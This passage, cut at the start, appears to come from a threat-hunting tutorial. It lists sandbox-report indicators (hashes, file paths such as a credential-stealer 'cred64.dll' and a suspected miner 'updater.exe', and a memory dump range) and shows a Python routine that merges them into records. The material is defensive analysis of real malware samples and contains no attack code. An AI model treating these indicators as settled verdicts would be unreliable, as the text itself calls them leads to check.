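| SHA256 | 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbghelp.dll
| MD5 | 2215b082f5128ab5e3f28219f9c4118a |
| SHA256 | 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d |
memory/4940-490-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp
C:\Windows\TEMP\xyvvnnvseiqa.xml
| MD5 | 546d67a48ff2bf7682cea9fac07b942e |
| SHA256 | eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a |
C:\Program Files\Google\Chrome\updater.exe
| SHA256 | f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll
| SHA256 | 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867 |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll
| SHA256 | 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867 |
"""

if __name__ == "__main__":
    records, regions = ioc_records(SAMPLE)
    print(json.dumps(records, indent=2))
    for r in regions:
        print(f"pid {r.pid} dump {r.index}: {r.size:#x} bytes")
```

Running it on the sample prints four merged records (dbghelp.dll and cred64.dll each with `seen: 2`) and one memory region of 0xAC1000 bytes for PID 4940. The flags are hunting leads, not verdicts: the Opera installer files under `AppData\Local\Temp` get no flag, while the `Program Files\Google\Chrome\updater.exe` record is worth checking against the "Unsigned PE" and "XMRig Miner payload" tags in the report header before treating it as an indicator.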